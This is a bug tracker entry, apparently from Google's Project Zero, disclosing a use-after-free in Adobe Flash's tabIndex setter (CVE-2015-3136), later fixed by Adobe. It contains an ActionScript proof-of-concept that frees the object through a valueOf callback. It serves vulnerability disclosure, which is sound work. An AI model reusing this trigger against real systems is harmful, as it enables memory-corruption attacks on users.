New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 3 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Jul 2015
Cc:



Sign in to add a comment
Adobe Flash: Use-after-free in tabIndex setter
Project Member Reported by natashenka@google.com, May 14 2015 Back to list
There is a use-after-free issue in the tabIndex setter in both the Button and MovieClip class (this issue needs to be fixed both places). If the tabIndex is set, and then the number parameter has valueOf defined, it is possible to jump into script and free the Button or MovieClip before the tabIndex is set.

A proof-of-concept is as follows:



	_global.mc = this;
	
	var n = {valueOf: func};
	var test = this.createEmptyMovieClip("test", 1);
	test.tabIndex= n;
	
function func(){
	
	trace("here");
	//_global.mc.createEmptyMovieClip("test2", 1);
	var t = _global.mc.createTextField("test2", 1, 0, 0, 10, 10);
	trace(t);
	t.removeTextField();
	trace("here 2");
	return 7;
	
	}


A sample swf and fla is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
settabs.fla
5.8 KB Download
settabs.swf
973 bytes Download
Project Member Comment 1 by natashenka@google.com, May 15 2015
Labels: -Reported-2015-May-14 Reported-2015-May-15
Project Member Comment 2 by natashenka@google.com, May 18 2015
This is PSIRT-3713
Comment 3 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-3136
Comment 4 by cevans@google.com, Jul 9 2015
Labels: Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
Project Member Comment 5 by natashenka@google.com, Aug 3 2015
Labels: -Restrict-View-Commit
Sign in to add a comment